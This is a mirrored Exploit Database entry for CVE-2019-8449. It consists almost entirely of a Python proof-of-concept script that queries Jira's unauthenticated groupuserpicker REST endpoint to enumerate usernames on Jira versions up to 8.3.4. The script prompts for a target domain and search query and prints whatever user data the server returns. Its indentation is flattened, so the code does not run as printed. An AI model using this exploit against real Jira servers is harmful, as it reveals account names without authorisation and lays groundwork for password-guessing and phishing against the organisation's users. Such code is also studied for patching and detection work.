Jira 8.3.4 – Information Disclosure (Username Enumeration)

• Exploit Database
• 15 阅读

• 作者： Mufeed VH
  日期： 2020-02-03
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/47990/

• # Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)
  # Date: 2019-09-11
  # Exploit Author: Mufeed VH
  # Vendor Homepage: https://www.atlassian.com/
  # Software Link: https://www.atlassian.com/software/jira
  # Version: 8.3.4
  # Tested on: Pop!_OS 19.10
  # CVE : CVE-2019-8449
  
  # CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4
  # DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/
  # CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796
  
  #!/usr/bin/env python
  
  
  __author__= "Mufeed VH (@mufeedvh)"
  
  import os
  import requests
  
  
  class CVE_2019_8449:
  def ask_for_domain(self):
  domain = raw_input("[>] Enter the domain of Jira instance: => ")
  if domain == "":
  print("\n[-] ERROR: domain is required\n")
  self.ask_for_domain()
  self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)
  
  def ask_for_query(self):
  self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")
  if self.query == "":
  print("\n[-] ERROR: The query parameter is required\n")
  self.ask_for_query()
  
  def exploit(self):
  self.ask_for_domain()
  self.ask_for_query()
  
  maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ")
  showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")
  fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ")
  projectId = raw_input("\n[>] Enter the projectId to fetch: => ")
  issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ")
  avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ")
  caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")
  excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")
  
  params = {
  'query': self.query, 
  'maxResults': maxResults, 
  'showAvatar': showAvatar, 
  'fieldId': fieldId, 
  'projectId': projectId, 
  'issueTypeId': issueTypeId, 
  'avatarSize': avatarSize, 
  'caseInsensitive': caseInsensitive, 
  'excludeConnectAddons': excludeConnectAddons
  }
  
  send_it = requests.get(url = self.url, params = params)
  
  try:
  response = send_it.json()
  except:
  print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")
  print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")
  print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))
  quit()
  
  print("\n<========== RESPONSE ==========>\n")
  print(response)
  print("\n<==============================>\n")
  
  if __name__ == '__main__':
  os.system('cls' if os.name == 'nt' else 'clear')
  
  print('''
  ================================================
  ||
  | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |
  |Proof of Concept By: Mufeed VH [@mufeedvh]|
  ||
  ================================================
  ''')
  
  CVE_2019_8449().exploit()